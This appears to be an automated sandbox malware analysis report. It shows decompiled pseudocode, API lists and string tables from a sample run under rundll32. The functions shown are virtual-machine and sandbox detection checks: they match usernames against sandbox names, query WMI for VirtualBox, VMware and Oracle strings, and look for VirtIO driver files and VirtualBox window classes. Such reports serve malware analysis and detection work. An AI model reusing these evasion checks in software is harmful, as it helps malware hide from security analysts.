				if (_t225 != 0) goto 0x3871df28;
				goto 0x3871df38; // executed
				_t90 = E000001C31C338720950(); // executed
				dil = _t90 == 0;
				return _t90 & 0xffffff00 | (_t161 & (_t161 & 0xffffff00 | _t224 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t85 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t82 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t77 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t212 == 0x00000000) & _t167 & (_t161 & 0xffffff00 | _t66 == 0x00000000) & 0 & (_t161 & 0xffffff00 | _t67 == 0x00000000) & (_t161 & 0xffffff00 | _t68 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t70 == 0x00000000) & (_t161 & 0xffffff00 | _t71 == 0x00000000) & (_t161 & 0xffffff00 | _t72 == 0x00000000) & (_t161 & 0xffffff00 | _t73 == 0x00000000) & (_t161 & 0xffffff00 | _t74 == 0x00000000) & (_t161 & 0xffffff00 | _t78 == 0x00000000) & (_t161 & 0xffffff00 | _t79 == 0x00000000) & (_t161 & 0xffffff00 | _t80 == 0x00000000) & (_t161 & 0xffffff00 | _t83 == 0x00000000) & _t161) == 0x00000000;
			}

























































                                        0x1c33871dce2
                                        0x1c33871dce2
                                        0x1c33871dce4
                                        0x1c33871dcf0
                                        0x1c33871dcf6
                                        0x1c33871dcfe
                                        0x1c33871dd03
                                        0x1c33871dd07
                                        0x1c33871dd12
                                        0x1c33871dd18
                                        0x1c33871dd26
                                        0x1c33871dd32
                                        0x1c33871dd34
                                        0x1c33871dd42
                                        0x1c33871dd47
                                        0x1c33871dd4b
                                        0x1c33871dd51
                                        0x1c33871dd5e
                                        0x1c33871dd67
                                        0x1c33871dd6d
                                        0x1c33871dd7b
                                        0x1c33871dd84
                                        0x1c33871dd93
                                        0x1c33871dd96
                                        0x1c33871dd9f
                                        0x1c33871dda6
                                        0x1c33871ddad
                                        0x1c33871ddc0
                                        0x1c33871ddce
                                        0x1c33871dddc
                                        0x1c33871ddea
                                        0x1c33871ddf8
                                        0x1c33871de06
                                        0x1c33871de14
                                        0x1c33871de22
                                        0x1c33871de30
                                        0x1c33871de3e
                                        0x1c33871de43
                                        0x1c33871de4c
                                        0x1c33871de52
                                        0x1c33871de57
                                        0x1c33871de5b
                                        0x1c33871de61
                                        0x1c33871de67
                                        0x1c33871de75
                                        0x1c33871de83
                                        0x1c33871de91
                                        0x1c33871dea4
                                        0x1c33871dea8
                                        0x1c33871deae
                                        0x1c33871deb0
                                        0x1c33871debe
                                        0x1c33871decc
                                        0x1c33871ded1
                                        0x1c33871ded5
                                        0x1c33871dedb
                                        0x1c33871dedd
                                        0x1c33871def2
                                        0x1c33871def7
                                        0x1c33871defb
                                        0x1c33871df01
                                        0x1c33871df03
                                        0x1c33871df08
                                        0x1c33871df11
                                        0x1c33871df13
                                        0x1c33871df18
                                        0x1c33871df1c
                                        0x1c33871df22
                                        0x1c33871df26
                                        0x1c33871df28
                                        0x1c33871df2f
                                        0x1c33871df50

                                        APIs
                                          • Part of subcall function 000001C33871E2E0: RegOpenKeyExW.ADVAPI32 ref: 000001C33871E3D8
                                          • Part of subcall function 000001C33871E430: GetWindowsDirectoryW.KERNEL32 ref: 000001C33871E55D
                                          • Part of subcall function 000001C33871E430: Wow64DisableWow64FsRedirection.KERNEL32 ref: 000001C33871E571
                                          • Part of subcall function 000001C33871E430: PathCombineW.SHLWAPI ref: 000001C33871E590
                                          • Part of subcall function 000001C33871E430: GetFileAttributesW.KERNEL32 ref: 000001C33871E5CA
                                          • Part of subcall function 000001C33871E6A0: ExpandEnvironmentStringsW.KERNEL32 ref: 000001C33871E744
                                          • Part of subcall function 000001C33871E6A0: PathCombineW.SHLWAPI ref: 000001C33871E770
                                          • Part of subcall function 000001C33871E6A0: GetFileAttributesW.KERNEL32 ref: 000001C33871E77E
                                          • Part of subcall function 000001C338720FD0: GetProcessHeap.KERNEL32 ref: 000001C338720FEC
                                          • Part of subcall function 000001C338720FD0: HeapAlloc.KERNEL32 ref: 000001C338720FFD
                                          • Part of subcall function 000001C33871E7D0: CreateFileW.KERNEL32 ref: 000001C33871E869
                                        • FindWindowW.USER32 ref: 000001C33871DD84
                                        • FindWindowW.USER32 ref: 000001C33871DD96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCombineFindHeapPathWindowWow64$AllocCreateDirectoryDisableEnvironmentExpandOpenProcessRedirectionStringsWindows
                                        • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                        • API String ID: 3985774531-1325860762
                                        • Opcode ID: 51dc2ca28e6fceea5886baf658b83979a18fae7bc906fc872d50bbb68b8c2bf5
                                        • Instruction ID: 23cf026aae8bc88e5c9d59f3432576e0e53794e5e1d4ac9a7b047ba3fea400de
                                        • Opcode Fuzzy Hash: 51dc2ca28e6fceea5886baf658b83979a18fae7bc906fc872d50bbb68b8c2bf5
                                        • Instruction Fuzzy Hash: 3A21CF737A2B9002FA6426354D85FDA1287BB84780F0DA63B6D359B6CAEE59CA010342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720770 Relevance: 33.3, APIs: 1, Strings: 18, Instructions: 89COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                                        • API String ID: 2645101109-2358638013
                                        • Opcode ID: f127e8f769bbdd4ab8cd243d58800cd5c42322d4f5f2d3b27f0b81df4fe1052e
                                        • Instruction ID: ad2b1ffbd838095418358125e8c82b1f8da2caf961afe91bfbd7b314381e8971
                                        • Opcode Fuzzy Hash: f127e8f769bbdd4ab8cd243d58800cd5c42322d4f5f2d3b27f0b81df4fe1052e
                                        • Instruction Fuzzy Hash: 4A413B35286FC095F6519B04F8887CA73A4F788780F446627DEAC0BB65EF78CA44CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871F300 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 147memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 26%
                                        			E000001C31C33871F300(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v56;
				signed short _v64;
				void* _v72;
				long long _v80;
				long long _v88;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t98;
				intOrPtr* _t114;
				long long _t134;
				long long _t135;
				void* _t146;

				_t135 = __rsi;
				_a24 = _t134;
				_v72 = _t134;
				_a16 = _t134;
				_t54 = E000001C31C3387211C0(_t53,  &_a24,  &_v72, __rsi); // executed
				if (_t54 == 0) goto 0x3871f50b;
				_v24 = __rbx;
				_v32 = _t135;
				_v40 = __r14;
				__imp__#2();
				__imp__#2();
				_t9 = _t134 + 1; // 0x1
				r14d = _t9;
				_t104 = __rax;
				if (__rax == 0) goto 0x3871f3ba;
				if (__rax == 0) goto 0x3871f3b1;
				_v80 =  &_a16;
				_t13 = _t134 + 0x30; // 0x30
				r9d = _t13;
				_v88 = _t134;
				_t145 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871f3b1;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				_t137 = _v32;
				if (__rax == 0) goto 0x3871f3cd;
				__imp__#6();
				if (r14d == 0) goto 0x3871f4fd;
				_t114 = _a16;
				_a32 = _t134;
				_a8 = 0;
				if (_t114 == 0) goto 0x3871f4d6;
				asm("o16 nop [eax+eax]");
				_v88 =  &_a8;
				r8d = 1; // executed
				 *((intOrPtr*)( *_t114 + 0x20))();
				if (_a8 == 0) goto 0x3871f4d2;
				_v80 = _t134;
				r8d = 0;
				_v88 = _t134;
				_t98 =  *_a32; // executed
				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0x3871f4b9;
				_t60 = _v64 & 0x0000ffff;
				if (_t60 == 1) goto 0x3871f4b9;
				if ((_t60 & 0x00000008) == 0) goto 0x3871f4af;
				E000001C31C33880E5B0(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
				if (_t98 != 0) goto 0x3871f4ad;
				E000001C31C33880E5B0(_t104, _v56, L"82441FX", _v32, _t145, _t146);
				if (_t98 != 0) goto 0x3871f4ad;
				E000001C31C33880E5B0(_t104, _v56, L"82371SB", _v32, _t145, _t146);
				if (_t98 != 0) goto 0x3871f4ad;
				E000001C31C33880E5B0(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
				if (_t98 == 0) goto 0x3871f4af;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0x3871f400;
				goto 0x3871f4d6;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize(); // executed
				dil = 1 - 3 >= 0;
				return 0;
			}



















                                        0x1c33871f300
                                        0x1c33871f314
                                        0x1c33871f318
                                        0x1c33871f31c
                                        0x1c33871f320
                                        0x1c33871f327
                                        0x1c33871f32d
                                        0x1c33871f339
                                        0x1c33871f33e
                                        0x1c33871f343
                                        0x1c33871f353
                                        0x1c33871f359
                                        0x1c33871f359
                                        0x1c33871f35d
                                        0x1c33871f363
                                        0x1c33871f368
                                        0x1c33871f372
                                        0x1c33871f377
                                        0x1c33871f377
                                        0x1c33871f37e
                                        0x1c33871f386
                                        0x1c33871f392
                                        0x1c33871f398
                                        0x1c33871f39e
                                        0x1c33871f3a8
                                        0x1c33871f3ab
                                        0x1c33871f3b4
                                        0x1c33871f3ba
                                        0x1c33871f3c2
                                        0x1c33871f3c7
                                        0x1c33871f3d5
                                        0x1c33871f3db
                                        0x1c33871f3e1
                                        0x1c33871f3e5
                                        0x1c33871f3eb
                                        0x1c33871f3f5
                                        0x1c33871f407
                                        0x1c33871f413
                                        0x1c33871f419
                                        0x1c33871f41f
                                        0x1c33871f42d
                                        0x1c33871f439
                                        0x1c33871f43c
                                        0x1c33871f441
                                        0x1c33871f449
                                        0x1c33871f44b
                                        0x1c33871f453
                                        0x1c33871f457
                                        0x1c33871f464
                                        0x1c33871f46c
                                        0x1c33871f479
                                        0x1c33871f481
                                        0x1c33871f48e
                                        0x1c33871f496
                                        0x1c33871f4a3
                                        0x1c33871f4ab
                                        0x1c33871f4b3
                                        0x1c33871f4c0
                                        0x1c33871f4ca
                                        0x1c33871f4d0
                                        0x1c33871f4d9
                                        0x1c33871f4e3
                                        0x1c33871f4ed
                                        0x1c33871f4f0
                                        0x1c33871f4f9
                                        0x1c33871f50a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1414631806-1350769890
                                        • Opcode ID: 75e4b6060b89eb8ce9141b0134c110ababce2369b9deacf8eb005bb6c1104aa2
                                        • Instruction ID: 73c1968a487cbf0177487994f5b827a7441eb78b3f85f7a2c26c79ddb12dcacc
                                        • Opcode Fuzzy Hash: 75e4b6060b89eb8ce9141b0134c110ababce2369b9deacf8eb005bb6c1104aa2
                                        • Instruction Fuzzy Hash: 2F614E32341B8086FB119F25E494ADC77A5FB84B98F04A513EE6E47B69DF38C646C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3387209C0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 130memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                                        • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                                        • API String ID: 4173814494-4167877488
                                        • Opcode ID: f13186b3c8aa9554891e6f494d136dfc83b806f2ae06a96f91c01f0200a4991e
                                        • Instruction ID: 441a20fcbfe5936fca7bada3cf7faac1d39889a9d74d453e61434eecf19c50c0
                                        • Opcode Fuzzy Hash: f13186b3c8aa9554891e6f494d136dfc83b806f2ae06a96f91c01f0200a4991e
                                        • Instruction Fuzzy Hash: 4C511636241B9186FB10DF25E884A9C77B1F788B88F45A116DE6E47B68DF38C688C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720370 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 125COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 48%
                                        			E000001C31C338720370(long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t59;
				void* _t66;
				void* _t74;
				void* _t78;
				signed long long _t91;
				signed long long _t105;
				void* _t126;
				signed long long _t131;
				WCHAR* _t136;
				void* _t139;
				signed long long _t140;
				void* _t142;

				_t131 = __rdi;
				 *((long long*)(_t139 + 8)) = __rbx;
				 *((long long*)(_t139 + 0x10)) = __rsi;
				 *((long long*)(_t139 + 0x18)) = __rdi;
				_t137 = _t139 - 0x5b0;
				_t140 = _t139 - 0x6b0;
				_t91 =  *0x38903000; // 0x9bfaf736ae76
				 *(_t139 - 0x5b0 + 0x5a0) = _t91 ^ _t140;
				 *((long long*)(_t140 + 0x30)) = L"System32\\drivers\\balloon.sys";
				r8d = 0x208;
				 *((long long*)(_t140 + 0x38)) = L"System32\\drivers\\netkvm.sys";
				 *((long long*)(_t140 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
				 *((long long*)(_t140 + 0x48)) = L"System32\\drivers\\viofs.sys";
				 *((long long*)(_t140 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
				 *((long long*)(_t140 + 0x58)) = L"System32\\drivers\\vioinput.sys";
				 *((long long*)(_t140 + 0x60)) = L"System32\\drivers\\viorng.sys";
				 *((long long*)(_t140 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
				 *((long long*)(_t140 + 0x70)) = L"System32\\drivers\\vioser.sys";
				 *((long long*)(_t140 + 0x78)) = L"System32\\drivers\\viostor.sys";
				E000001C31C33880E410(_t66, 0, _t74, _t78, _t139 - 0x5b0 + 0x190, _t126, __rdi, _t142);
				r8d = 0x208;
				E000001C31C33880E410(_t66, 0, _t74, _t78, _t139 - 0x530, _t126, _t131, _t142);
				 *(_t140 + 0x28) = _t131;
				GetWindowsDirectoryW(_t136);
				if (E000001C31C338720E50() == 0) goto 0x3872046a;
				__imp__Wow64DisableWow64FsRedirection();
				_t105 = _t131;
				__imp__PathCombineW();
				r8d = 0x200;
				E000001C31C33880E410(_t66, 0, 0, _t78, _t137 + 0x3a0, _t137 + 0x190, _t131,  *((intOrPtr*)(_t140 + 0x30 + _t105 * 8)));
				0x3871e130();
				_t59 = GetFileAttributesW(??); // executed
				if (_t59 == 0xffffffff) goto 0x387204c9;
				if ((_t59 & 0x00000010) == 0) goto 0x387204d4;
				if (_t105 + 1 - 0xa < 0) goto 0x38720470;
				goto 0x387204d9;
				 *((intOrPtr*)(_t140 + 0x20)) = 0;
				if ( *0x38904490 == 8) goto 0x38720502;
				if (1 - 0x1e < 0) goto 0x387204f0;
				goto 0x38720561;
				if ( *0x1C3389044E4 == dil) goto 0x38720561;
				if ( *0x38904490 == 8) goto 0x3872052a;
				if (1 - 0x1e < 0) goto 0x38720518;
				goto 0x3872053f;
				if ( *((intOrPtr*)(0x1c3389044e4)) == dil) goto 0x3872053f;
				GetCurrentProcess();
				 *((long long*)( *0x1C3389044E8))();
				if ( *((intOrPtr*)(_t140 + 0x20)) == 0) goto 0x38720561;
				__imp__Wow64RevertWow64FsRedirection();
				E000001C31C33880C290();
				return 1;
			}















                                        0x1c338720370
                                        0x1c338720370
                                        0x1c338720375
                                        0x1c33872037a
                                        0x1c338720380
                                        0x1c338720388
                                        0x1c33872038f
                                        0x1c338720399
                                        0x1c3387203a9
                                        0x1c3387203bc
                                        0x1c3387203c2
                                        0x1c3387203ce
                                        0x1c3387203da
                                        0x1c3387203e6
                                        0x1c3387203f2
                                        0x1c3387203fe
                                        0x1c33872040a
                                        0x1c338720416
                                        0x1c338720422
                                        0x1c338720427
                                        0x1c338720432
                                        0x1c338720438
                                        0x1c33872044b
                                        0x1c338720450
                                        0x1c33872045d
                                        0x1c338720464
                                        0x1c33872046c
                                        0x1c338720480
                                        0x1c33872048f
                                        0x1c338720495
                                        0x1c3387204b1
                                        0x1c3387204ba
                                        0x1c3387204c3
                                        0x1c3387204c7
                                        0x1c3387204d0
                                        0x1c3387204d2
                                        0x1c3387204e0
                                        0x1c3387204f3
                                        0x1c3387204fe
                                        0x1c338720500
                                        0x1c338720511
                                        0x1c33872051b
                                        0x1c338720526
                                        0x1c338720528
                                        0x1c338720538
                                        0x1c33872053f
                                        0x1c33872054d
                                        0x1c338720554
                                        0x1c33872055b
                                        0x1c33872056d
                                        0x1c33872058a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                        • API String ID: 2137468328-3181514389
                                        • Opcode ID: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction ID: 5b607e48da16ebf8596ee077d1710be79725cbc00538d70a908981aa10fea76c
                                        • Opcode Fuzzy Hash: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction Fuzzy Hash: E051AE32250B8099FB21CB29E854BDA73A5F784784F84A127DEAD47BA4DF38C745C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871F730 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 166memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 990 1c33871f730-1c33871f762 call 1c3387211c0 993 1c33871f9a7-1c33871f9b4 990->993 994 1c33871f768-1c33871f7ae call 1c3388445f8 * 2 990->994 999 1c33871f805-1c33871f810 994->999 1000 1c33871f7b0-1c33871f7b3 994->1000 1001 1c33871f81b-1c33871f82b 999->1001 1002 1c33871f812-1c33871f815 SysFreeString 999->1002 1003 1c33871f7b5-1c33871f7d1 1000->1003 1004 1c33871f7fc-1c33871f7ff SysFreeString 1000->1004 1005 1c33871f994-1c33871f9a6 1001->1005 1006 1c33871f831-1c33871f856 1001->1006 1002->1001 1007 1c33871f7db-1c33871f7dd 1003->1007 1004->999 1008 1c33871f974-1c33871f98e CoUninitialize 1006->1008 1009 1c33871f85c 1006->1009 1007->1004 1010 1c33871f7df-1c33871f7f6 CoUninitialize 1007->1010 1008->1005 1011 1c33871f860-1c33871f87d 1009->1011 1010->1004 1015 1c33871f883-1c33871f89f 1011->1015 1016 1c33871f970 1011->1016 1019 1c33871f8a5-1c33871f8a7 1015->1019 1016->1008 1021 1c33871f8a9-1c33871f8ae 1019->1021 1022 1c33871f8d7-1c33871f923 1019->1022 1021->1022 1023 1c33871f8b0-1c33871f8b4 1021->1023 1028 1c33871f925-1c33871f92a 1022->1028 1029 1c33871f953-1c33871f95f 1022->1029 1024 1c33871f8b6-1c33871f8c9 call 1c33880e5b0 1023->1024 1025 1c33871f8cd-1c33871f8d1 VariantClear 1023->1025 1024->1025 1025->1022 1028->1029 1031 1c33871f92c-1c33871f930 1028->1031 1029->1016 1035 1c33871f961-1c33871f968 1029->1035 1033 1c33871f949-1c33871f94d VariantClear 1031->1033 1034 1c33871f932-1c33871f945 call 1c33880e5b0 1031->1034 1033->1029 1034->1033 1035->1011 1038 1c33871f96e 1035->1038 1038->1008
                                        C-Code - Quality: 16%
                                        			E000001C31C33871F730(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
				void* __rbx;
				void* _t74;
				void* _t75;
				void* _t93;
				long long _t117;
				long long _t119;
				void* _t122;
				intOrPtr* _t131;
				long long _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t168;
				long long _t173;

				_t156 = __rsi;
				_t159 = _t160 - 0x47;
				_t161 = _t160 - 0x90;
				r15d = 0;
				 *((long long*)(_t159 + 0x7f)) = _t173;
				 *((long long*)(_t159 - 0x19)) = _t173;
				 *((long long*)(_t159 + 0x77)) = _t173;
				_t75 = E000001C31C3387211C0(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
				if (_t75 == 0) goto 0x3871f9a7;
				 *((long long*)(_t161 + 0x88)) = _t156;
				 *((long long*)(_t161 + 0x80)) = __rdi;
				 *((long long*)(_t161 + 0x78)) = __r12;
				 *((long long*)(_t161 + 0x70)) = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x3871f805;
				if (__rax == 0) goto 0x3871f7fc;
				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
				_t14 = _t173 + 0x30; // 0x30
				r9d = _t14;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0x3871f7fc;
				r14d = r15d;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
				 *((intOrPtr*)(_t117 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x3871f81b;
				__imp__#6();
				if (r14d == 0) goto 0x3871f994;
				_t131 =  *((intOrPtr*)(_t159 + 0x77));
				 *((long long*)(_t159 + 0x6f)) = _t173;
				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
				 *(_t159 - 0x11) = r15w;
				 *((long long*)(_t159 - 0xf)) = _t117;
				 *((long long*)(_t159 - 7)) = _t117;
				 *((intOrPtr*)(_t159 + 1)) = 0;
				 *((short*)(_t159 + 5)) = 0;
				if (_t131 == 0) goto 0x3871f974;
				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t131 + 0x20))();
				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0x3871f970;
				 *((long long*)(_t161 + 0x28)) = _t173;
				r8d = 0;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
				 *((intOrPtr*)(_t119 + 0x20))();
				if (0 < 0) goto 0x3871f8d7;
				if ( *(_t159 - 0x11) == r12w) goto 0x3871f8d7;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x3871f8cd;
				E000001C31C33880E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				 *(_t159 + 7) = r15w;
				 *((long long*)(_t159 + 0x11)) = _t119;
				 *((long long*)(_t159 + 9)) = _t119;
				r8d = 0;
				asm("movups xmm0, [ebp+0x7]");
				 *((intOrPtr*)(_t159 + 0x19)) = 0;
				 *((short*)(_t159 + 0x1d)) = 0;
				asm("movsd xmm1, [ebp+0x17]");
				asm("movups [ebp-0x11], xmm0");
				 *((long long*)(_t161 + 0x28)) = _t173;
				asm("movsd [ebp-0x1], xmm1");
				 *((long long*)(_t161 + 0x20)) = _t173;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
				if (0 < 0) goto 0x3871f953;
				if ( *(_t159 - 0x11) == r12w) goto 0x3871f953;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x3871f949;
				E000001C31C33880E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
				if (_t93 != 0) goto 0x3871f970;
				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0x3871f860;
				goto 0x3871f974;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t93;
			}

















                                        0x1c33871f730
                                        0x1c33871f735
                                        0x1c33871f73a
                                        0x1c33871f741
                                        0x1c33871f74c
                                        0x1c33871f750
                                        0x1c33871f757
                                        0x1c33871f75b
                                        0x1c33871f762
                                        0x1c33871f768
                                        0x1c33871f777
                                        0x1c33871f77f
                                        0x1c33871f784
                                        0x1c33871f789
                                        0x1c33871f799
                                        0x1c33871f79f
                                        0x1c33871f7a8
                                        0x1c33871f7ae
                                        0x1c33871f7b3
                                        0x1c33871f7bd
                                        0x1c33871f7c2
                                        0x1c33871f7c2
                                        0x1c33871f7c9
                                        0x1c33871f7d1
                                        0x1c33871f7dd
                                        0x1c33871f7e3
                                        0x1c33871f7e9
                                        0x1c33871f7f0
                                        0x1c33871f7f3
                                        0x1c33871f7f6
                                        0x1c33871f7ff
                                        0x1c33871f810
                                        0x1c33871f815
                                        0x1c33871f82b
                                        0x1c33871f831
                                        0x1c33871f837
                                        0x1c33871f83b
                                        0x1c33871f83f
                                        0x1c33871f844
                                        0x1c33871f848
                                        0x1c33871f84c
                                        0x1c33871f84f
                                        0x1c33871f856
                                        0x1c33871f867
                                        0x1c33871f873
                                        0x1c33871f876
                                        0x1c33871f87d
                                        0x1c33871f88b
                                        0x1c33871f897
                                        0x1c33871f89a
                                        0x1c33871f89f
                                        0x1c33871f8a2
                                        0x1c33871f8a7
                                        0x1c33871f8ae
                                        0x1c33871f8b4
                                        0x1c33871f8c1
                                        0x1c33871f8c9
                                        0x1c33871f8d1
                                        0x1c33871f8e1
                                        0x1c33871f8e6
                                        0x1c33871f8f1
                                        0x1c33871f8f5
                                        0x1c33871f8f8
                                        0x1c33871f8fc
                                        0x1c33871f8ff
                                        0x1c33871f903
                                        0x1c33871f908
                                        0x1c33871f90c
                                        0x1c33871f911
                                        0x1c33871f919
                                        0x1c33871f91e
                                        0x1c33871f923
                                        0x1c33871f92a
                                        0x1c33871f930
                                        0x1c33871f93d
                                        0x1c33871f945
                                        0x1c33871f94d
                                        0x1c33871f95a
                                        0x1c33871f95f
                                        0x1c33871f968
                                        0x1c33871f96e
                                        0x1c33871f977
                                        0x1c33871f981
                                        0x1c33871f98b
                                        0x1c33871f98e
                                        0x1c33871f9a6

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                                        • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                                        • API String ID: 1018877641-1142199694
